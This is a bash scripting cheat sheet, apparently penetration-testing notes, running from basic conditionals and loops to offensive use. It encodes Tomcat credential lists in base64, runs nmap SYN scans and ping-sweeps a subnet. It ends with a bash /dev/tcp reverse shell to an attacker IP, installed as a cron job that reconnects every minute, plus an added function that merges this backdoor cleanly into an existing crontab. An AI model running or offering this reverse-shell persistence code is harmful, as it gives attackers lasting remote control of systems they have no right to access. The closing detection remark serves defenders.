All your happy shiny bash scripts must start with a shebang:
#!/bin/bash
How-To: https://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO-6.html
Basic Structure:
#!/bin/bash
if [ "foo" = "foo" ]; then
    echo expression evaluated as true
else
    echo expression evaluated as false
fi
Example:
#!/bin/bash
echo "Enter username: "
read -r un
echo "Enter password: "
read -r -s pw    # -s keeps the typed password off the terminal
if [[ "$un" = "admin" && "$pw" = "superuser" ]]; then
    echo "Login Successful"
fi
NOTE: The == operator is a non-standard (bash) extension. Bash also accepts == for equality inside single-bracket [ ], but that is not POSIX, so use = there and keep == for the bash-only [[ ]]:
if [[ "$x" == "valid" ]]; then    # bash-only [[ ]]: == is fine here
if [ "$x" = "valid" ]; then       # portable [ ]: use =
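Added example, not from the original page: the quoting these comparisons need once the value can be empty or contain spaces, including the classic unquoted -n check that accepts blank input. Function names are hypothetical and the admin/superuser values are constructed test data.

```bash
#!/bin/bash
# Added example, not from the original page. Function names are hypothetical;
# the admin/superuser values are constructed test data.

# Portable check with single [ and =: every expansion is double-quoted.
# Without the quotes an empty $1 turns [ $1 = admin ] into [ = admin ]
# (a syntax error) and a value like "a b" is split into two words.
check_creds() {
    if [ "$1" = "admin" ] && [ "$2" = "superuser" ]; then
        return 0
    fi
    return 1
}

# BUG on purpose: unquoted -n test. With an empty argument the word
# disappears and the test becomes [ -n ], which is TRUE (a one-argument
# test asks "is this string non-empty", and "-n" is non-empty). So a
# "must not be blank" check silently accepts blank input.
unquoted_nonempty() {
    [ -n $1 ]
}

# Fixed: quoting keeps the empty argument in place, so [ -n "" ] is false.
quoted_nonempty() {
    [ -n "$1" ]
}

# Glob matching without the bash-only [[ ]]: case is POSIX and never splits.
is_conf_file() {
    case "$1" in
        *.conf) return 0 ;;
        *)      return 1 ;;
    esac
}

# Demo when run directly:
check_creds admin superuser && echo "admin login ok"
unquoted_nonempty "" && echo "unquoted -n accepted an empty string (bug)"
quoted_nonempty ""   || echo "quoted -n rejected the empty string"
```

The unquoted -n case is the one worth remembering: the script does not crash, it just passes the check it was supposed to enforce.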
Run a command 5 times:
for i in {1..5}; do COMMAND-HERE; done             # runs the command 5 times
for (( c=1; c<=5; c++ )); do COMMAND-HERE; done    # same thing, C-style loop
for i in {0..10..2}; do COMMAND-HERE; done         # brace range with a step: i = 0, 2, 4, ..., 10
Or…
for((i=1;i<=10;i+=2)); do echo "Welcome $i times"; done
Work On Files:
# General
for i in *; do echo "$i"; done
# To encode multiple username:password combos in a text file to Base64
# ($(cat file) splits on whitespace, so each combo must be a single word)
for cred in $(cat tomcat.txt); do echo -n "$cred" | base64; done
# Same as above, but appended to a text file
for cred in $(cat tomcat.txt); do echo -n "$cred" | base64 >> tomcat_base64.txt; done
# NOTE: The -n on the echo is necessary to NOT output the trailing newline character to the encoder
# (otherwise the newline is encoded into the token and the credential no longer matches)
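Added example, not from the original page: the credential-encoding loop done line by line, so entries containing spaces survive, CRLF files work, and no trailing newline reaches the encoder. The file name tomcat.txt is the page's; the sample entries are constructed, and b64_cred / encode_cred_file are hypothetical names.

```bash
#!/bin/bash
# Added example, not from the original page. Function names are hypothetical;
# the sample credential lines are constructed.

# Encode one "user:pass" string. printf '%s' emits no trailing newline
# (the job echo -n does in the loop above); tr removes the line wrap GNU
# base64 inserts after 76 characters, so long combos still come out as one token.
b64_cred() {
    printf '%s' "$1" | base64 | tr -d '\n'
}

# Read a credential file on stdin, one user:pass per line, and print one
# base64 token per line. for cred in $(cat file) splits on whitespace and
# would turn "admin:s3cret pass" into two bogus entries; read -r does not.
# Blank lines and #comments are skipped, and a CR from CRLF files is dropped
# (otherwise it is encoded into the token).
encode_cred_file() {
    while IFS= read -r cred || [ -n "$cred" ]; do
        cred=$(printf '%s' "$cred" | tr -d '\r')
        case "$cred" in
            '' | '#'*) continue ;;
        esac
        b64_cred "$cred"
        printf '\n'
    done
}

# Usage against the real list:  encode_cred_file < tomcat.txt > tomcat_base64.txt
# Stand-alone demo with a constructed list (a CRLF line, a comment, an entry with a space):
printf 'tomcat:tomcat\r\n# manager account\nadmin:s3cret pass\n' | encode_cred_file
```

Decoding a token with base64 -d is a quick way to confirm nothing extra (newline, CR) was encoded along with the credential.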
Or…
for i in /etc/*.conf; do cp "$i" /backup; done
With an iplist.txt containing one target IP per line (-sS is a SYN scan and needs root):
for ip in $(cat iplist.txt); do nmap -sS -p 80 -T4 "$ip"; done
Or, with & after each scan so they run in parallel rather than one after another:
for ip in $(cat iplist.txt); do nmap -sS -p 80 -T4 "$ip" & done; wait
Simple sweep of a network for a quick look at what machines are out there (and respond):
for i in {1..254}; do
    ping -w 5 -c 1 192.168.0.$i | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done
wait   # no args: wait until all background processes have finished
Note the "&" at the end of the ping pipeline. Each ping runs in the background, so the 254 probes overlap instead of each waiting for the previous one's timeout, and wait collects them all before the script goes on. This speeds things up a lot.
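Added example, not from the original page: the sweep above as a function, with the reply parsing split out so it can be checked on its own. parse_ping_reply and sweep_subnet are hypothetical names, the ping flags are those of Linux iputils ping, and the reply lines in the demo are constructed, not captured from a live network.

```bash
#!/bin/bash
# Added example, not from the original page. Function names are hypothetical;
# ping flags are Linux iputils; demo reply lines are constructed.

# Print the address from reply lines of the form
#   64 bytes from 192.168.0.12: icmp_seq=1 ttl=64 time=0.41 ms
# and drop every other line (headers, statistics, errors). Same job as the
# grep | cut | tr chain above, in one sed.
parse_ping_reply() {
    sed -n 's/^64 bytes from \([0-9][0-9.]*\).*/\1/p'
}

# Sweep prefix.first .. prefix.last, one background ping per host, then
# wait for all of them. -c 1: one probe; -W 1: give up after 1 s.
# Output is in arrival order, so sort it (see usage below).
sweep_subnet() {
    prefix=$1
    i=${2:-1}
    last=${3:-254}
    while [ "$i" -le "$last" ]; do
        ping -c 1 -W 1 "$prefix.$i" 2>/dev/null | parse_ping_reply &
        i=$((i + 1))
    done
    wait   # no args: block until every background pipeline has finished
}

# Usage on a real network (not run here):
#   sweep_subnet 192.168.0 | sort -t . -k 4,4n
# Stand-alone demo of the parser on constructed ping output:
printf '%s\n' \
    'PING 192.168.0.12 (192.168.0.12) 56(84) bytes of data.' \
    '64 bytes from 192.168.0.12: icmp_seq=1 ttl=64 time=0.41 ms' \
    '--- 192.168.0.12 ping statistics ---' \
    | parse_ping_reply
```

One background job per host is fine for a /24; for anything much larger, bound the concurrency (for example by feeding the host list to xargs -P) instead of forking tens of thousands of pings at once.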
Reverse shell using bash's /dev/tcp/host/port pseudo-device (described in the REDIRECTION section of the bash manpage; it is implemented by bash itself, not by a file under /dev, so it needs bash, not sh):
/bin/bash -c 'bash -i &> /dev/tcp/[attack ip]/[port] 0>&1'
For persistence on a target: put this one-liner in a crontab entry (a cronjob) that runs every minute of every day:
echo "* * * * * /bin/bash -c 'bash -i &> /dev/tcp/[attack ip]/[port] 0>&1'" > gk_cron_job
crontab gk_cron_job   # install the file as the user's crontab (this replaces any existing entries)
crontab -l            # list the user's crontab and verify
Set up a listener on the attack machine (nc -nvlp [port#]) and the shell should connect back within 1 minute.
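Added example, not from the original page: adding the reverse-shell entry to whatever crontab the user already has instead of replacing it, and not adding it twice on a re-run. Function names are hypothetical; 10.0.0.5 and 4444 in the demo stand in for [attack ip] and [port].

```bash
#!/bin/bash
# Added example, not from the original page. Function names are hypothetical;
# 10.0.0.5 / 4444 stand in for [attack ip] / [port].

# Build the crontab line for an attacker IP and port.
cron_entry() {
    printf "* * * * * /bin/bash -c 'bash -i &> /dev/tcp/%s/%s 0>&1'\n" "$1" "$2"
}

# Read a crontab on stdin, append ENTRY unless an identical line is already
# there, and write the merged table to stdout. A pure text transform, so it
# can be exercised without touching a real crontab.
merge_crontab() {
    entry=$1
    existing=$(cat)
    if [ -n "$existing" ]; then
        printf '%s\n' "$existing"
    fi
    if ! printf '%s\n' "$existing" | grep -Fqx -- "$entry"; then
        printf '%s\n' "$entry"
    fi
}

# On the target: current crontab (empty if none) -> merge -> "crontab -"
# (reads the new table from stdin), then list it to verify.
install_cron_shell() {
    entry=$(cron_entry "$1" "$2")
    crontab -l 2>/dev/null | merge_crontab "$entry" | crontab -
    crontab -l | grep -F -- "$entry"
}

# Demo with a constructed crontab; install_cron_shell is not called here.
printf '0 * * * * /usr/bin/true\n' | merge_crontab "$(cron_entry 10.0.0.5 4444)"
```

Cron runs each entry through /bin/sh, which is why the line wraps the shell in an explicit /bin/bash -c: the &> redirection and /dev/tcp only exist in bash. The entry is plain text in the user's crontab, so crontab -l (or grep for /dev/tcp across /var/spool/cron) is also exactly how a defender will find it.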